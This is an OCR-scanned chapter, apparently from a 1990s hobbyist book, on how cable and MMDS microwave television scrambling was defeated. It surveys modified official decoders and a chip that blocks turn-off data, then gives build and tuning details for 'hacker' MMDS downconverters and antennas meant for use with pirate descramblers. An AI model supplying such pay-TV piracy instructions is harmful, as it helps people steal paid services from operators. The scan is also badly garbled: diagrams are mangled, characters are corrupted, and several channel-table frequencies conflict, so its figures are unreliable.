tee-shirt than they expected. Many of them did not even have descramblers, 
pirate or official. This was of course a bit of a legal problem when some 
raids were carried out. 


e Baseband Systems 


The RF based techniques were economical in terms of descrambler unit 
cost. However they did not offer enough security. This fact was painfully 
brought home to management of large cablenets. The fact that the RF 
techniques were also nearly fifteen years old is also a factor in the falling 
level of security that they offer. The solution, for many of the cable systems 
manufacturers was to go for baseband scrambling techniques. 


The beginnings of the move away from RF based techniques started in the 
mid eighties with systems like the Zenith SSAVI and VideoCipher II in the 
USA and with systems like Discret here in Europe. 


Zenith SSAVI 


The Zenith SSAVI system is used also manufactured in Europe under 
licence. SSAVI is an acronym for Suppressed Synch and Video Inversion. It 
is a relatively old system and there are hardware modifications that will open 
the official descrambler for all channels. A pirate descrambler however is a 
more complex project than the simple suppressed synch systems as it is 
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necessary to demodulate the video and take the data for descrambling the 
signal directly from the VBI. 


In the American variant of this system, the subscriber authorisation data is 
transmitted on lines 10, 11, 12 and 13. Each descrambler contains an 
identity stored in RAM. The system operates on an inclusion principle so the 
descrambler must receive a heart beat signal periodically or it will shut 
down. 


As with most other systems that use suppressed synch as a scrambling 
technique, the vertical interval is untouched. This allows the official 
descrambler to obtain the necessary data and levels to descramble the 
signal. This, while allowing the official descramblers to resynchronise and 
descramble, also allows the pirate descrambler designs to do likewise. 


The pirate descramblers use a PLL running at 32 times the horizontal 
refresh rate. This provides adequate stability for regenerating the synch 
pulses. The best example of this kind of PLL synch regeneration circuitry 
can be found in the FilmNet SATPAC PLL descrambler case study in 
chapter 3. Admittedly it would have to be slightly modified for this system. 


The SSAVI system allows for five levels of scrambling: 

Suppressed Synch and Pseudo Random Video Inversion 
Suppressed Synch and Average Peak Level Video Inversion 
Suppressed Synch and Normal Video 

Normal Synch and Pseudo Random Video Inversion 

Normal Synch and APL Video Inversion 

Ten or so years ago, these techniques were unusual and for some, 


downright scary. Of course with the expertise on analogue satellite hacking, 
which is baseband, they are not really much of a challenge. 


The video inversion is flagged. In line 19 of the NTSC signal, the Vertical 
Interval Colour Reference signal is transmitted. This allows consists of a 
chrominance reference bar and a luminance reference level and a black 
level reference. By comparing the the voltage level of the luminance level 
with that of the black level reference it was possible to ascertain the whether 
the video in the subsequent lines was inverted or normal. The video 
inversion was field based. 


However the main problem with most of the pirate descrambler designs was 
that they required a Zenith tuner as the front end. Effectively they would 
have the guts of a television receiver less the display circuitry. It was an 
expensive and complex hack. The hacker solution, as with the Jerrold 
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system, was geared towards modifying the official descrambler to operate in 
a piratical manner. 


Many of the early modifications were based on shorting or cutting tracks. As 
the complexity of the situation increased, the hackers had to use Test Chips 
and other hacks. 


Orion Irdeto CableCrypt 


The previous system, SSAVI, is primarily an analogue system that does not 
replace the synch pulses. The Orion, IRDETO and CableCrypt systems 
however do replace the synch pulses with digital data. 


The video is not strongly scrambled on the above systems and it is relatively 
easy for a satellite hacker to build a video only decoder. However the digital 
audio is a completely different problem. 


The digital is the particular strength of the ORION, IRDETO and CableCrypt 
systems. It is not an economical hack for someone to make a pirate digital 
audio decoder for these devices. The key to hacking these system lies in 
the official decoder. 


The ORION decoders were effectively hacked using replacement EPROMs 
and other test chips. Some of the security circuitry in these decoders was 
potted in epoxy resin in an attempt to stop hacker getting to it. It was only a 
minor inconvenience. 


These decoders use the embedded secure microcontroller principle. The 
access control data is transmitted in what would ordinarily be the vertical 
blanking interval. The security relies mainly on the difficulty of hacking the 
secure microcontroller in the decoder. 


Of course a more obvious vulnerability exists. The data has to get to the 
secure microcontroller. This is the aspect that was apparently hacked. On 
satellite, there information that suggests that one of the satellite versions of 
IRDETO, as used by TelePiu in Italy has been hacked using a PIC16C57. 
The PIC16C57 blocks turn-off data to the secure microcontroller in the 
official decoder. 


Theoretically, such a hack on the system could easily be ECMed. If the 
algorithm used to encrypt the over the air data is soft, (is held in EEPROM 
or RAM), it can be changed for a more secure version. This would allow the 
decoder to be upgraded over the air. The problem with this is that the 
general trend in decoder design, especially cable type decoders, is towards 
a customised version of an off the shelf microcontroller. The best example 
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of this is the secured microcontroller in the VideoCrypt decoder is actually a 
customised Motorola 68705. 


The main secure microcontroller in the CableCrypt decoder seems to be a 
custom device. The algorithm for the decryption of the over the air data may 
well be hardwired in the ROM of this microcontroller. 


While the system may give the impression of providing very high security, it 
is these simplistic hacks that have pockmarked the history of such systems. 
There is of course a trade-off between security and usability. 


IRDETO seems to market the idea that they can offer a cablenet or service 
a turnkey operation that takes care of everything. They take care of all the 
business and logistical operations but the fact that CableCrypt has been 
hacked does tend to question the part that security plays in the whole 
package. Perhaps it is a case of the "acceptable level of piracy" practice. 
Any cablenet is going to suffer some piracy therefore as long as this piracy 
can be kept at a safe level it is acceptable. 


Admittedly the formats of the system that were hacked were the initial 
versions. IRDETO may well have repaired the security mistakes that 
enabled the hacks to take place. 


It is my opinion that relying on a single particular approach, that of the 
Embedded Secure Microcontroller, is wrong and dangerous. This architec- 
ture, especially in the closed environment of a cable system has continually 
proven to be vulnerable. 


What enabled these systems to be hacked is the fact that there is a 
Blackbox industry of hackers with the necessary skills, equipment and 
finance. Given that Europe is perhaps the most hostile piracy environment 
on the planet, there was no way that any system would remain secure for 
long. Fighting piracy by press release is not an option. 


The fact that the legislation may protect the cablenet is of little comfort when 
the system is hacked. The fact that this information may become available 
via the internet or BBSes is a particularly worrying thing. 
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Section 2: Microwave Television 


The Multichannel Multipoint Distribution System, (MMDS), otherwise known 
as microwave television, has been adopted by the Irish Department of 
Communications as a means to distribute television channels in areas that 
would be uneconomical to cable. 


The legitimate cable companies have made a considerable investment in 
their cablenets. With respect to the size of its population, Ireland is one of 
the most cabled countries in Europe. In the UK cable television has met with 
sporadic success. In Ireland, all the major cities are cabled. Eventhough the 
subscribers may sometimes complain about the quality of the service they 
depend on the cablenet to supply their television viewing. If an MMDS 
transmitter service commenced within ten or twenty miles of the cablenet, 
some of the subscribers would purchase MMDS reception equipment. 
Depending on the proximity of the transmitter, a considerable percentage of 
the cablenet subscribers would opt for the MMDS. This would put the 
cablenet's financial future in danger and more importantly, it would put the 
jobs of the people working for the cablenet in danger. It is for this reason 
that the cablenets were offered the first chance at the areas surrounding 
their cablenets. 


With satellite television, the state monopoly has been smashed and the 
captive audience of RTE has disappeared. People in the areas as yet 
uncabled seem to want a choice of stations. The logical move was for 
satellite television but the UK terrestrial channels are not yet available on 
satellite. The pirate rebeam operators are taking the English terrestrial 
television channels and filling this market gap. MMDS was intended to 
eliminate these pirates and to introduce some sort of order into the 
broadcast situation. It did not. 


Full MMDS coverage of Ireland or any country cannot be achieved. While 
many areas will cover up to 75% of the franchise there will still be a need for 
fill-in stations. The most feasible type of fill-in station would be a short 
distance link to a communal antenna feeding a small cable system. This 
kind of system would place most of the engineering on ground familiar to 
the people who work for the cable companies. 


The frequency range for the new microwave television system will be 2.5 
GHz to 2.68 GHz. This frequency allocation differs from the American 
version. The American frequency range is from 2.15 GHz to 2.16 GHz and 
from 2.5 GHz to 2.68 GHz. 


The basic concept of the system is that each subscriber will have a rooftop 
antenna and microwave converter. The required channels will be transmit- 
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ted from a MMDS transmission installation. Each receiving antenna will 
have to have a clear line-of-sight view of the transmitting antenna. 
Microwave signals are drastically attenuated by any obstructions such as 
trees, buildings and hills. 


One of the main attractions of the MMDS system is the small amount of 
power required to cover an area. It has been estimated that approximately 
one watt of RF power is required to give a mile of usable signal area. This 
implies that 100 miles could be covered using 100 Watts. This is a 
theoretical situation. In reality the areas are much smaller, typically the area 
being thirty or forty miles in diameter. This makes the prospect of direct 
substitution of the pirate rebeam operations more feasible. The main 
problem that the cable companies have with the pirates is the uncontrollable 
reception of the pirated signal. With microwaves, the creation of reception 
black spots is a lot easier than at UHF though in some cases their creation 
is totally non-intentional. 


The band is divided into odd and even channels. Odd channels are 
designated Group A and even channels are designated Group B. Each 
franchise is allocated odd or even channels. This ensures that there is a 
gap of 8 MHz between each channel on an MMDS net. 


Group A 

Channel Frequency Limits Vision Carrier Sound Carrier 

01 2500 - 2508 2501.25 2507.25 
03 2516-2524 2517.25 2525.25 
05 2532 - 2540 2553.25 2539.25 
07 2548-2556 2549.25 2555.25 
09 2564-2572 2565.25 2571.25 
11 2580-2588 2581.25 2587.25 
13 2596 - 2604 2597.25 2603.25 
15 2612-2620 2613.25 2619.25 
17 2628 - 2636 2629.25 2635.25 
19 2644 - 2652 2645.25 2651.25 
21 2660 - 2668 2551.25 2667.25 


All frequencies аге іп MHz. 


An offset of 7.8125 KHz is permitted in some cases. This is to reduce the 
possibility of interference from other nets. The nets with offset frequencies 
are designated A+ and B+. 
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The use of odd and even channels also opens the possibility of direct 
downconversion to bands where existing RTE transmitters are operating. 
The channels could theoretically coexist on the band with minimal interfer- 
ence. This would be a theoretical rather than practical possibility. 


Group B 

Channel Frequency Limits Vision Carrier Sound Carrier 

02 2508-2516 2509.25 2515.25 
04 2524-2552 2517.25 2551.25 
06 2540- 2548 2533.25 2547.25 
08 2556 - 2564 2549.25 2563.25 
10 2572-2580 2565.25 2579.25 
12 2588-2596 2581.25 2595.25 
14 2604-2612 2597.25 2611.25 
16 2620-2628 2615.25 2627.25 
18 2656 - 2644 2629.25 2645.25 
20 2652 - 2660 2645.25 2659.25 
22 2668 - 2676 2331.25 2675.25 


All frequencies аге in MHz. 


The concept of MMDS is to supply a number of installations via an 
omnidirectional transmitting antenna. The franchises are defined by a 
transmission radius. 


The transmitting equipment is standard MMDS transmission equipment. 
The frequency tolerance is +/- 500 Hz. This tolerance can easily be 
achieved by use of a crystal oven. The transmitters have to be synthesised 
to maintain this tolerance over all channels on a net. 


The minimum signal level at the edge of the franchise is 45dB. The 
maximum effective isotropic radiated power allowed for this performance is 
32 dBW. The EIRP is the transmitter output multiplied by the antenna gain. 
The antenna gain in this case is referred to an isotropic radiator. An 
isotropic radiator is a point in space that radiates equally in all directions. 


The height of the transmitting antenna is calculated by measuring its height 
above the average ground level between three and fifteen kilometres 
distance from the antenna. This procedure is carried out for eighteen 
radials. The starting radial is at true North and the angular distance between 
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each radial is twenty degrees. The effective height of the antenna is the 
worst value obtained from this procedure. 


The field strength at the edge of the franchise is not supposed to exceed 
66dBuV/M. The EIRP of the transmitter will be adjusted to achieve this 
value. In order to avoid interference to other nets, the maximum antenna 
height for full power transmissions is two hundred metres. The EIRP will 
have to be reduced by 1 dB for every twenty five metres up to a maximum of 
5 dB at the maximum height of three hundred and twenty five metres. 


The reception specifications for the system detail a 6 dB noise figure for the 
receiver. This figure is easily achieved using GaASFETS. A noise figure of 4 
dB could be reached by using some of the cheaper silicon high frequency 
transistors. 


The output impedance of the receiver is 75R in order to match the input 
impedance of the television. The permitted output blocks are as follows. 


Band I 47 MHz - 68 MHz 21 MHz Block 
Band III 174 MHz - 230 MHz 56 MHz Block 
BandIV/V 470 MHz - 862 MHz 392 MHz Block 


In the official receivers, no overlap of local RTE transmitters is allowed. A 
bypass circuit to allow the subscriber to switch between MMDS channels 
and off-air channels has to be provided in the design. The official receiver 
also has to comply with the relevant electrical safety regulations. The RF 
output level has to be 60 dBuV with a tolerance of +12 dB or -6 dB. 


The receiver specification is generous. The noise figure specification can 
easily be reached by a number of techniques. The output blocks may 
provide a problem. For the lower blocks, the receiver will have to have a 
variable local oscillator. This adds to the overall cost of the receiver. The 
UHF block provides the most promise as the full MMDS block can be block 
downconverted to UHF. 


The antenna specification is similarly generous. The recommended gain of 
the receiving antenna is 22 dBi with a front to back ratio of 20 dB. The 
orthogonal polarisation discrimination on the main lobe is 19dB. The 
diameter of a parabolic antenna with this gain at 2500 MHz and with an 
efficiency of 5596 is 64.84 centimetres. 


The only cablenet in Ireland that seems to have adopted blanket scrambling 
of channels is the Cork cablenet. The other cablenets are partially 
scrambled. The same pattern is being repeated on the MMDS networks. 
This has led to problems as there is piracy on these MMDS networks. Most 
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of the piracy originates from third party MMDS downconverters rather than 
hackers making their own downconverters. 


The Irish Broadcasting Act 1990 clearly makes piracy a crime. If you wish to 
experiment get permission. Hacking MMDS is not the same as satellite 
hacking. The risks are too great. This may sound like heresy but part of 
being a good hacker is knowing when to hack. 


The cable companies in Ireland are relatively new to the field of microwave 
engineering. Most of the present hackers have been involved in satellite 
television from the early days. In the early days, the only band worth 
experimenting with was C-Band. The cost of microwave integrated circuits 
from the United States was too high for most. The alternative was to use 
“home brew” converters and amplifiers. The Antiparallel Diode Mixer and 
the 3 dB Hybrid Mixer were two of the commonest designs used by the 
experimenters. These designs were built using microstrip etched on 
standard G-10 fibreglass board. The advantage of the antiparallel diode 
mixer was that the local oscillator frequency was half that which would have 
been required by a standard mixer. 


In order to have a tunable IF block, the C-Band Block was converted down 
to UHF, (470 to 870 MHz). This did not cover the full C-Band block and as a 
result the microwave oscillator had to be retuned depending on the section 
of the block required. A standard UHF tuner was then used to tune this 
converted block. 


As can be seen from the hacker downconverters, the whole system is 
financially insecure. The actual cost of the hacker converter is in the region 
of ten pounds. The cost of the microwave antenna would be approximately 
the same. The cable companies will probably have to charge a fee in the 
region of two to three hundred pounds per annum. A commercial pirate 
design could be manufactured and sold for about one hundred and fifty 
pounds. This would destabilise the cable companies and microwave 
companies who have not scrambled their signal. Of course the problem of 
legality enters into the equation. It is safer to hack satellite channels as there 
is less likelihood of being caught. 


€ —Lumped Microstrip Components 


The concept of an MMDS receiver system is not very different from the 
C-Band downconverter. The MMDS block has to be downconverted to UHF 
for use by a UHF tuner. No further processing is required as the 
transmission format is AM VSB. This means that the downconverted MMDS 
signal can be used by an ordinary television unless the signal is scrambled. 
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Most of the circuits at MMDS frequencies use microstrip components 
instead of discrete components. Microstrip is a circuit element in which the 
properties of a piece of printed circuit board track are used to simulate a 
discrete component. This a cheaper option as the value of the component 
can be controlled through the manufacturing process. The value of the 
component does not change drastically from board to board. 


A piece of printed circuit board track on a double sided printed circuit board, 
with one side acting as a ground plane, operating at a given frequency has 
resistance, inductance and capacitance. It also has a frequency dependent 
property of impedance. 


The inductance of the piece of track is mainly affected by the thickness of 
the conductor, the width of the conductor and the length of the conductor. 
The capacitance of the track is mainly affected by the thickness of the 
printed circuit board material and the area of the conductor. 


By using the properties of a piece of track, passive components can be 
fabricated. Individual capacitors can be formed by interdigitating two pieces 
of track. The ends of each piece of track are shaped like fingers so that they 
interlock but do not touch. The gaps between each finger or digit provide a 
repeatable amount of capacitance. 


The value of the capacitance is usually in the region of fractions of a 
picofarad. It is an easy way out when there is no conventional component 
that can be used. The commonest applications are matching networks and 
filters. 


Inductors can also be easily and repeatably fabricated. In their simplest 
form they are fabricated from thin tracks. The tracks can be spiraled to 
increase the inductance achievable in a given area. When drafting inductors 
in microstrip, it is easier to draw lines than spirals. The spirals are “squared” 
to make then easier to draw or plot. The squared spiral also provides more 
inductance per area than the spiral. 


Some of the higher quality PCB design programs have microstrip compo- 
nent libraries. While it is easy to use a PCB CAD package that will do the 
calculations and plot the boards, many of the top hackers prefer to draft the 
boards by hand. The rationale behind this is simple. Any fresh faced 
university graduate can use a CAD package but only a real designer can do 
it by mind. A well designed microstrip board is a work of art and the essence 
of art lies in the mind rather than in the brush. 
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Microstrip Components 


Microstrip Cross Section 
Dielectric ¢ Substrate) 
З . Conductor (Microstrip? 





Б Groundplane (Unetched Copper? 


— 


Interdigitated 
Capacitor. 


The interdigitated capacitor is formed 
from two pieces of microstrip track. 
The value of such capacitors is 
typically below 10pF. 


Squared Spiral 
Inductor 





Bonding .— 


Microstrip 
wire n 


track 
The track impedance 
is typically above 120R. 


8-37 


8: Cable And Microwave Distribution 


The Antiparallel Diode Mixer 


The antiparallel diode mixer has the unconventional characteristic of 
requiring a local oscillator running at half the normal frequency. 


The mixer consists of two microstrip resonators and two Schottky barrier 
diodes. With reference to the diagram, A is an open circuited half 
wavelength line at the signal frequency. The intermediate frequency is taken 
from the midpoint of this line. The other line is a short circuited quarter 
wavelength at the normal oscillator frequency. 


The oscillator level required for this mixer is 0 dBmV. The isolation between 
the RF port and the local oscillator port is good. The mixer does require 
some preamplification prior to the mixer and some filtering after the mixer. 


This design was used in many of the commercial C-Band downconverters in 
the US. It is very easy to fabricate and as such this should make it popular 
with hackers. It is used as part of the second hacker downconverter detailed 
later in the chapter. 


The Ratrace or 3 dB Hybrid Mixer 


The ratrace mixer is essentially a balanced mixer. By counting the number 
of quarter wavelength phase shifts in each signal path it can be seen that 
the signal and local oscillator waves arrive at each diode in antiphase with 
each other. The signal power and the local oscillator power are coupled to 
the mixer diodes with low loss. This makes the mixer more sensitive and 
less lossy. 


The mixer is wideband and as a result it requires some form of filtering on 
the output. The minimum filter is a quarter wavelength open circuited stub. 
The stub length is a quarter wavelength at the signal frequency and as such 
attenuates any microwave signals at the output of the mixer. Ideally a low 
pass filter for the required output passband should be designed. 


The noise figure of the mixer is relatively low. Figures of 4 dB to 7 dB have 
been quoted for C-Band. The loss of the mixer is in the region of 6 dB to 9 
dB. The noise figure of the mixer is not as critical as the noise figure of the 
preamplifier. In this case, the signal levels require some amplification prior 
to mixing. 


The Image Rejection Mixer 


When the intermediate frequency is low, the converter is more prone to 
interference from the image frequency signals. The standard IF of most of 
the first and second generation C-Band satellite television receivers was 70 
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Microstrip Mixer Circuits 
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MHz. This meant that the image frequency response was 140 MHz away 
from the signal frequency. The image frequency was within the C-Band 
block. The image rejection filter was a clever use of phase shifts to cancel 
the image frequency components. 


The incoming signal was split and phase shifted by 90 degrees in the first 3 
dB coupler. The two signals were then fed to two ratrace mixers. These 
mixers were fed from the same oscillator. The outputs from the two ratrace 
mixers were then combined and the out of phase components canceled. 


While this design has been popular with C-Band users, its use in the United 
States by MMDS hackers has been limited. This is due to the relatively large 
PCB area required. Most designs are based on the standard G10 fibreglass 
board. This has a dielectric constant of 4.7 to 5. A reduction in size could be 
achieved by using a board with a higher dielectric constant. The problem is 
that the cost of the board material also increases. 


The MMDS system as it stands is totally insecure. The ease with which it 
can be hacked must give some of the MMDS operators nightmares. To 
hack this system, the hacker has to convert the block in use down to UHF or 
VHF. Researchers have obtained usable bandwidths of 50% of the centre 
frequency from the 3 dB Hybrid mixer. This would make it a good choice for 
use in a downconverter. A local oscillator for the Irish system would be 
running at a frequency of about 2.0 GHz. This would convert the block down 
to UHF tuner range. A simple one transistor fixed frequency oscillator could 
be used to provide the conversion oscillator. 


The Hacker MMDS Downconverter 1 


This section, as they say, is included purely for informational purposes only. 
The author and the publishers accept no responsibility for the use or misuse 
of the information by the reader. 


This design is based on an American design of 1982 vintage. It is a single 
downconversion type with its output on US Channel 3, (61.25 MHz). The 
rationale of choosing this output frequency is that it can be directly 
interfaced with pirate descrambler designs for the scrambling systems in 
use on MMDS. However with the current trend towards hard systems such 
as Cryptovision, this is not that relevant any more. Of course with the 
simpler systems such as the Jerrold Tri-Mode, a pirate descrambler could 
be built. 


The components used in the design are readily available. The original 
design used the MRF901 transistor. The BFR90, BFR91, BFR34A transis- 
tors can be substituted for this transistor. The BFR91 would be a better 
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Hacker MMDS Converter 1 
Local Oscillator Tuning 





Trim base line for correct local 
oscillator frequency. 


During Tuning Procedure Vcc = 14 Volts. 


In the event of cutting the base line too 
short, the local oscillator frequency will 

ke too high. If this is the case use the 

same technique employed in the tuning of 

Hacker Converter 2 local oscillator, 
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choice for the oscillator transistor as it has a higher current handling 
capacity. 


The preamplifier amplifies the incoming MMDS signal to a usable level. By 
using stubs, some filtering of the input is carried out prior to mixing. The 
BFR90 can be replaced with a microwave transistor if you are willing to do 
some experimenting. The increase in quality is sometimes worth the cost. 


The mixer is the standard 3 db hybrid mixer. The 3 db hybrid mixer is 
essentially a balanced mixer. By counting the number of quarter wavelength 
phase shifts in each signal path it can be seen that the signal and local 
oscillator waves arrive at each diode in antiphase with each other. The 
signal power and the local oscillator power are coupled to the mixer diodes 
with low loss. This makes the mixer more sensitive and less lossy. The 
diodes are biased on to provide greater sensitivity. The output of the mixer 
has a wide low impedance stub to act as a lowpass filter. The filtered 
intermediate frequency is then fed to the output amplifier. The output 
amplifier is wideband. A UHF band filter and amplifier could be used at this 
point instead of the output amplifier. 


The oscillator output is taken from the base of the oscillator transistor. The 
oscillator output is fed to the mixer by use of a directional coupler. The 
amount of oscillator power reaching the mixer is controlled by the distance 
between the microstrip tracks on the board. The end of the input track to the 
mixer is taken to ground by a 51R resistor. This is to balance the ports of 
the mixer. For temperature stability, a diode chain is included in the 
oscillator. The drift factor of the local oscillator is approximately 0.17 MHz 
per degree Centigrade. 


The operating range of the local oscillator is set by trimming the base line of 
the oscillator transistor with the supply voltage set to 14 Volts. The supply 
range can be varied over the 12V to 16V range. 


The Hacker MMDS Downconverter 2 


This design originally appeared in the Pink And Brown Book. The Pink And 
Brown Book was published in May 1986. The design had its origins in 2300 
MHz amateur radio equipment. The power supply as published was a 
biohazard as the fuse was in the wrong position. This fault has been 
corrected in the version presented here. 


The input to the downconverter is DC shorted via two high impedance stubs 
which are earthed. A microstrip interdigitated capacitor is used to decouple 
the input of the microwave amplifier. A stub is used to tune the output of the 


8-47 


8: Cable And Microwave Distribution 


о 48443^u03 SCWW 423»290H 





LETCOAN 


eol ж “294% 99а JO 
494 sı 4uauoduo) = ж 


xL. 347186#@М сєтәозм 40 
toii GEGP93N 


OI 


0 


Hu 001 = INO 04 
HYO9G = 9670 











LET203N 
7 Qul 





4ndinn 


f fscno 
not T 





0“ 


ALt 041 NOT 3OZ* 


8-48 


8: Cable And Microwave Distribution 





8: Cable And Microwave Distribution 


* 
ч 
1 
LI 
l 
] 


o 
u 


=. 


‚т 





8-50 


8: Cable And Microwave Distribution 


Hacker MMDS Converter 2 PSU 


110 


L 0A5 To TV [8—1 


4 x 1N4001 7805 Un Heatsink 


To Converter 





18V 


Ensure thot TV socket is isolated. 
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Hacker MMDS Converter 2 
Local Oscillator Tuning 
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Trim this PCB track to set the 
required local oscillator frequency. 


During Tuning Procedure Vcc = 10 Volts 
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In the event of having cut the 
oscillator line too short, solder a 
0.25” length of resistor lead offcut 
to line and repeat tuning procedure. 





During Tuning Procedure Vcc = 10 Volts 
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microwave amplifier. The output of the amplifier is fed to the mixer via 
another microstrip interdigitated capacitor. 


The mixer used in this design is ап Antiparallel Diode Mixer. This allows the 
local oscillator to run at half the normal local oscillator frequency. The 
oscillator frequency is doubled in the mixer. The diodes used in the mixer 
are Schottky microwave diodes. 


The local oscillator is a simple one transistor design. A coarse adjustment of 
the oscillator frequency is performed by trimming the collector microstrip 
element. Channel selection is performed by varying the supply voltage 
between 6VO and 14V. 


The output of the mixer is fed to a wideband amplifier. In the original design, 
the output frequency was 55 to 85 MHz. This is Band | and as such it is 
suitable for input to a VHF tuner strip. This would provide a baseband output 
for use with pirate descramblers. 


Oscillator Alignment 


The easiest way to set up the downconverter is by use of off-air signals. A 
the present, this is not possible. There is an alternative method. 


The irradiated tuned line method has been widely used by radio amateurs to 
set up microwave oscillators. A piece of copper wire, ( the inner wire of a 
coaxial cable ), is stretched over a groundplane such as a piece of unetched 
PCB material. The distance between the wire and the groundplane is 
approximately 2 mm. 


One end of the wire is soldered to the ground plane. The other end is 
soldered to an OA91 or similar germanium diode. The other end of this 
diode is soldered to a 200 uA microammeter. 


The line is irradiated by the signal from the local oscillator. By sliding a 
screwdriver along the line, the meter will indicate a series of lows and highs. 
These readings correspond to the troughs and peaks of the signal. By 
measuring the distance between the peaks, the frequency of the oscillator 
can be calculated. The formula is expressed below. 


F,= 15000/D 


Where F, is the oscillator frequency in MegaHertz and D is the distance 
between troughs in Centimetres. 
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Checking Microwave Oscillator Frequencies 


The frequency of a microwave oscillator can ke measured by 
irradiating a tuned line and measuring the distance between 
troughs or between peaks on the meter readings. The 
screwdriver tunes the line by shorting it to ground. 


F= 15000/D 


Where Ғ Is in MHz ond D 15 Іп cm. 
Screwdriver 


100 uA Full Scale Deflection solder 
\ 








Copper Clad PCB Material. 


Copper Dielectric — 


copper wire (TV coax Inner) 
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MMDS Antenna Designs 


One of the best sources of antenna designs for MMDS is the RSGB VHF 
And UHF Manual. This book contains a number of antenna designs that are 
easily adapted for MMDS use. 


A number of antennas can be built for use with the hacker converter. The 
ones covered in this chapter are as follows; the parabolic dish, the corner 
reflector, the ring Yagi, the helical and the “ray дип”. 


The Parabolic Reflector 


The parabolic antenna as used for satellite television reception can be used 
for MMDS. This is a rather expensive use of a dish. The reflective surface of 
a dish for use at MMDS can be mesh. The main factor governing the mesh 
gap is that it must be less than one eighth of the freespace wavelength of 
the lowest frequency of operation. Quarter inch wire mesh could be used. It 
is better to use the galvanised type rather than uncoated steel. The 
necessary formulae are given in the diagram. The gain of the parabolic is 
depends on the diameter and the operational frequency. With the launch of 
Astra, smaller dishes will be widely available at a low cost. For a gain of 22 
dBi at 2.5 GHz, a 64 centimetre diameter dish is required. 


The Comer Reflector 


The corner reflector essentially consists of two parts; the dipole and the 
reflector. The reflector is simply an angled piece of metal sheet or metal 
mesh. The gain of the antenna depends on the angle of the reflector bend. 
A large number of the American designs that have been published have 
disregarded one essential fact-the feed impedance of the antenna. As the 
angle of the bend decreases, the gain increases but the feed impedance 
decreases. The easiest angle to match to is an angle in the region from 60 
to 90 degrees. The closer the angle is to 60 degrees the better. Matching is 
carried out by varying the distance of the feed dipole from the centre of the 
angle. This distance, measured in fractions of a wavelength, is marked S in 
the diagram. For a 50R match, the range of S for the 60 degree angle is 
0.41 to 0.49. For the 90 degree angle, the range is 0.3 to 0.35. 


This is the easiest antenna type to fabricate and as such it will be one of the 
most widely used. It does not have significant integral strength. It may not 
stand up to any severe winds. Therefore it would be better fabricated from 
wire mesh. 
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Роғоройс Reflector 


Goin dBi- 10 log(nx(pixDo/D^e» 
n= efficiency ¢ typically 0.5) 


{= wavelength in metres 


D= diameter in metres 
f= focal distance 

c= depth of curve 
Equation: Y*2 = 4fx 


Materials Focal Length, f= D*2/16c 


The surface accuracy of the reflector must ре better 
than 1/8 th of a wavelength at the lowest operating 
frequency. Chicken wire mesh can ре used for the 
application. 


There ore a number of methods used to construct 
this antenna type. The simplest is to cut o template 
from plywood and then cut a number of ribs, normally 
eight, from a sheet of marine plywood. The ribs would 
then be assembled into a spider and the mesh attached 
with staples. A cheap satellite dish could also be used. 
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The Corner Reflector 


18 cm 


7cm 
p 0 mace 
3.8 cm [ 





9cm | 





Materials. 
The relfector is aluminium sheet. 
The dipole is 8 AWG copper wire. 
[ 3a ch Une section of the dipole is soldered 
š to the centre pin of an N type 
or BNC type connector. The other 


s section is soldered to the connector 
[3 fixing nut. 
7 cm 
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The Ring Yagi Antenna 


The ring Yagi design presented here is one that has been used by hackers 
in the United States for the reception of MMDS. There should be no 
problem in obtaining any of the components for this antenna. The driven 
element is made from a strip of copper and the reflector and directors being 
fabricated from aluminium strip of 3/10 inch thickness. 


The Helical Antenna 


The helical antenna is essentially a coil of wire wound on the outside of a 
plastic pipe. The main equations governing this type of antenna are given in 
the diagram. This antenna offers 12dBi gain for a seven turn helix. The 
impedance of such an antenna would be in the region of 140R and requires 
a quarter wavelength transformer to match it to the input impedance of the 
converter. Ideally low loss insulators should be used to hold the helix rigid 
but the plastic tube is a readily available, though lossy compromise. 


The Ray Gun Antenna 


The ray gun antenna can be thought of as a ring Yagi with solid directors. 
The primary difference between this and the ring Yagi described earlier is 
the feed method. The “ray gun” is fed using a wave guide arrangement. The 
waveguide can be fashioned out of a ЛІР tin can of the type used for 
catering. This wave guide without the "ray gun" assembly can give a gain in 
the region of 10dBi. 


The Funnel Antenna 


A further antenna type is the cone or funnel. The basis of this type of 
antenna is a cone of wire mesh on the tin can waveguide. The cone can be 
solid if required. A gain of 16 to 17dBi is possible with this antenna. When 
assembled, this antenna looks like a smoke stack on a chimney. This type 
of antenna has been used successfully by some American hackers. The 
people who worked for the MMDS companies couldn't tell them from real 
smoke stacks. Due to the ease of construction, this antenna will probably 
become a widely used antenna by the Irish hackers. 
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Ring Yagi Antenna 
Conductor and braid soldered 
to element. 


| Driven Element 


141 cm 
Circumference 


0.3 cm PTFE spacer 


Angle Aluminium ——— — ~ RG8 with М or BNC 
Boom Type socket. 


Reflector Element: 14.7 cm Circumference 
Director Element: 126 cm Circumference 
All elements ore formed from 3/16 * 


wide aluminium strip. Thickness is typically 
20 SWG оғ 22 SWG. 


S is а square aluminium sheet reflector 
of dimensions 68 cm by 6.8 cm. 














S 
R DE 
Di De рз D4 DS D6 D7 D8 D9 D10 119 D20 Dei Dee 
Lelle elele Lele аз 
Distances: 


ос 4.73 cm b= 145 cm c= 170 cm d= 1.20 cm 
e= 2.70 cm f= 2.70 cm g= 5.40 cm 
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Aluminium sheet reflector 


18 cm by 18 cm. 


N Type 
or BNC 
socket 





16 cm 


18 cm 


L_. 


P= 1 /4 
D= l / pi 


Where ( is the freespace 
wavelength of the frequency 
in use, 


Materials, 

The helix is made from 8 AWG copper 
wire. 1 3/4 * outside diameter plastic 
pipe is used to support the helix. 
The reflector is made from sheet 
aluminium, though mesh could be used. 


18 cm 
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Ray Gun Antenna 


10685 ” 1 0.25 ” diameter hole 
Length 


| | 175” Outside ы 


Diameter 0.032 ” Thickness 


0.25” Inside Diameter 
Tube 





ИЛЛ LDA DYDD AD LALA DA УЛУ ЛУ УУЛУУ УУ] 
| == Еш 


34.75 * Length of 0.25 * Threaded Bar 





Coffee can feed In 
plastic drain pipe, 

4 * outside diameter. 

Open end of feed 

is placed 175 ” from 

end cap. 


White plastic end cap 
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Funnel Antenna 
1 lb Coffee con 





Probe is 2.9 cm of 
copper wire, TV coax 
conductor or similar. 


52 cm 


-- 
189 en 


М Type or BNC Туре socket 


58.5 cm 


45.75 cm 





The funnel is constructed 
from quarter inch wire mesh 
over a rib structure. Four 
to eight ribs are necessary 
for ridgidity. The open end 
of the feed can ре covered 
with a white plastic cover. 
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Postscript 


MMDS in Ireland has not been a great success. Nor has it been a great 
failure. The rebeam operators, individuals rebroadcasting the UK channels 
